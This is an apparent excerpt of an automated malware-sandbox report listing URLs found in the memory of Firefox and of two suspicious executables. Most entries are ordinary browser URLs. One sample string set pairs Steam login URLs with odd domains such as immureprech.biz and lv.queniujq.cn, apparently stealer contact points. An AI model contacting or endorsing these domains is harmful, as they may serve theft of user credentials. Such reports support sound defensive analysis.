Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabthis.redux
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3005244049.00000287196E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://gre/modules/XPCOMUtils.sys.mjs
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://nimbus/ExperimentAPI.sys.mjs
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationssection.highlights.includeVisitedNumber
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000017.00000002.2626253770.000001324A203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000017.00000002.2703429736.0000013254FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2885951140.000002871AEF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2808659873.000002871AEE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2812987318.000002871AEF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000017.00000002.2703429736.0000013254FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2885951140.000002871AEF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2808659873.000002871AEE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2812987318.000002871AEF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000017.00000003.2520073438.000001324CD5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsMozilla
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3158219440.00000287193D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3144751360.000002871CAB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2963600825.000002871CAB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881SessionF
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2981927337.0000028719509000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: PK13K1G.exe, 00000008.00000003.2500389249.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000017.00000002.2622143175.0000013249203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2688659391.0000013250417000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B69D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2955075370.000002871ACDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submitresource://activity-stream/lib/FaviconFeed.jsmDisplays
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000017.00000002.2631147397.000001324C8BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.000001325537F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000017.00000002.2620149903.00000132489DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2646663636.000001324D64F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000017.00000002.2656770840.000001324ED1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000017.00000002.2657935720.000001324EE11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2627287813.000001324A741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2656770840.000001324ED0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000017.00000002.2657935720.000001324EE11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213ebA
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213ebapp.update.
Source: firefox.exe, 00000017.00000002.2674958419.0000013250257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2711239284.000029C74B200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000017.00000002.2711239284.000029C74B200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comZ
Source: firefox.exe, 00000017.00000002.2674958419.0000013250257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2664047201.000001324F4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.combrowser.taskbar.previews.cachetimeresource://gre/modules/IndexedDB.
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 00000017.00000002.2623987087.0000013249FCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626253770.000001324A221000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sFailed
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.alwa
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D1D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B2073000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestInvalid
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000017.00000002.2628867564.000001324B2E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sPdfJs.init
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
